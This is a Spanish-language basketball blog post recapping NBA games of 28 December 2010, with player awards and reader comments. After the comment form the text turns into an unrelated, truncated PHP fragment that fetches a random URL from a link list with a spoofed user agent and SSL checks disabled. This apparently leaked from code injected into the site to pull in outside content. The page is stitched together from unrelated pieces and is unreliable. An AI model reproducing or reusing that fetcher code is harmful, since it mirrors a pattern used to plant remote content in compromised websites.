La Crónica (29/12/2010)

30 de December de 2010 por txusma

Terremoto en Boston. A mediados del primer cuarto, Kevin Garnett se lesiona totalmente sólo y se ha de retirar del partido. Alarmas, dudas. Los Celtics tienen la esperanza de que se trate simplemente de algo muscular y que no sea nada serio porque saben que sin Garnett es imposible ganar el anillo. De momento lo que ganaron fue el choque con los Pistons (92-104). Paul Pierce lo dio todo pero no puedo hacer nada frente unos rejuvenecidos Tracy McGrady (cómo nos alegramos) y Tayshaun Prince. La lesión de Garnett descargó de un plumazo toda la tensión y el morbo generado por el hecho de enfrentarse a Charlie Villanueva, después de sus famosas declaraciones en que le calificaba como un “cáncer”. A saber que hubiera pasado de disputar todo el encuentro porque en lo poco que estuvo en cancha ya se encontraron un par de veces.

En cambio, los Lakers rompieron su racha de derrotar con una contundente victoria frente los Hornets (103-88). Adrew Bynum volvió a ser titular, desplaznado a Odom al banco, y las cosas funcionaron de otra manera, en parte gracias a los Hornets que demuestran que lo de principio de temporada no fue más que un espejismo.

El resto de cocos que jugaron anoche también ganaron. Miami sudó para vencer a los Rockets (125-119) y necesitó de otros 45 puntos de Wade. Lebron y Bosh le arroparon convenientemente. También sudaron para ganar los Nuggets frente los Wolves (119-113) y los Jazz frente los Clippers (103-95). En Denver, Billups fue el mejor de un equipo que no contó con Carmelo, Nene ni Martin y en Utah fue Al Jefferson (con el rookie Hayward ofreciendo, por fin, muestras de su calidad) el que lideró a su equipo para sobreponerse al enésimo gran partido de Blake Griffin. Los Thunder, por su parte,  lo tuvieron mucho más fácil frente los Nets (93-114), así como los Hawks que no vieron peligrar su victoria contra los Warriors en ningún momento a partir del segundo cuarto (93-103).

Y en los duelos grises de la jornada, victoria de los Kings frente los Grizzlies (98-100) con un buzzer-beater imposible de Tyreke Evans (no os lo perdáis) y un partidazo de Demarcus Cousins; sorprendente victoria a domicilio de los Sixers sobre los Suns (123-110) con Holiday, Nocioni y Turner tocando el violín; derrota de Pacers frente unos Wizards (90-104) en los que Nick Young ha encontrado su sitio; y tercera victoria consecutiva de los Bobcats esta vez contra los Cavs (92-101), con Jackson y Augustine talandro la canasta rival. Brown les ha hecho un gran favor largándose.

PREMIOS

MVP: Noche de grandes actuaciones individuales: 31-10 de Al Jefferson ante Griffin; 6 de 6 en triples de Chauncey Billups en Minneapolis, firmando 36 puntos, 5 asistencias, 3 robos y 2 rebotes; 38 puntos, 6 rebotes, 4 asistencias y 2 robos de Stephen Jackson… pero por encima de todos ponemos otra vez a Wade, con 45 puntos y 7 rebotes contra Houston.

Rookie: John Wall rondó el triple doble en su victoria contra Indiana, Hayward apareció de la nada en Utah, Evan Turner brilló en la victoria de los Sixers, Cousins arrasó desde el banquillo contra Memphis con 21-16, Griffin volvió a firmar otro doble doble con 31-12, pero su equipo perdió. Hoy parece complicado decidir pero se lo dejamos a Cousins a ver si se centra.

Sorpresa: No hace mucho le poníamos a parir pero anoche lideró a su equipo en una importantísima victoria contra los Celtics. Tracy McGrady con 21 puntos, 8 asistencias, 4 rebotes y 3 robos. Grande T-Mac.

Decepción: Si se confirma una lesión de rodilla grave para Garnett los Celtics lo tienen claro. Seguro que Villanueva no llorará la pérdida, sin embargo.

El mayor esfuerzo en vano: Podríamos nombrar a muchos. A Beasley&Love, a Griffin, a Zach… pero el partidazo de Pierce con 33 puntos, 8 asistencias, 5 rebotes y 4 robos fue el más en vano de su vida.

Comenta

8 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Mucho que comentar hoy,empezaré por los rookies,donde hoy han destacado muchos en especial Mr. Griffin,30-12 el animalico,yo creía que aún era pronto para considerarle AllStar,pobre de mi….
    Evan Turner,del que esperaba mucho más,por fin ha dado muestras de lo que seguramente llegará a ser.
    En resumen,jornada que deja en entredicho lo que muchos calificaban como la peor hornada de los últimos años.

    Nueva exhibición de Wade justo en el momento en el que ya se hablaba de Miami como el equipo de Lebron.
    Defendiendo así,y con esos 3 monstruos ofensivos…cuidadin.

    En Denver…Billups,partido sobresaliente de este veterano de guerra,desde la ausencia de Carmelo se ha puesto los galones y de que manera,con ayuda de 2 secundarios de autentico lujo como Lawson y Affalo.

    Y en Boston,donde parecía que Garnett este año estaba menos cojo que años anteriores…collejón en to el ozico,espero que no sea para mucho,quiero una final Boston-Lakers 😉

    Gran noticia lo de T-Mac,a la que ha tenido continuidad ha podido mostrarse y rendir a muy bien nivel,y lo Pistons lo están notando para bien.

      Citar

  2. Denise dice:
    #2

    Vaya canastón el de Evans. Pobrecillos estos Grizzlies, les pasa siempre todo lo malo.
    Los Sixers se cuelan en play offs aprovechandoel nivel pésimo del Este, 10-6 en sus últimos 16 partidos. Nada mal, para el equipo que tienen.
    Por fin un buen partido de McGrady, y ante todo unos Celtics.
    86 puntos del Big Three. Tremendo

      Citar

  3. -=TheKing=- dice:
    #3

    Los Suns han tirado ya la temporada.

      Citar

  4. Sempren dice:
    #4

    Hay que echarle un par de huevos para darle el balón decisivo a falta de 5 segundos a un tío que lleva una temporada mala de cojones, y un 2-9 en ese partido.
    Hablo de los Grizzlies, y el canastón de Mayo antes de que Evans hiciese magia

      Citar

  5. LEmontus dice:
    #5

    Yo espero lo peor para los suns por cargarse a Warrick y porque se cargarán a Pietrus.

      Citar

  6. Txusma dice:
    #6

    Q digo yo Lemontus… Cuando un jugador sale rebotado de 3 equipos diferentes (Memphis, MIlwaukee, Phoenix) podemos empezar a suponer que él tb tiene algo de culpa? O q número de equipos es necesario? 10?

      Citar

  7. TX dice:
    #7

    Pero como que se han cargado a Warrick? Sin Nash no vale ni tres pesetas

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    Tremendous O.J. Mayo y Evans haciendo sendos saltos de la rana.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>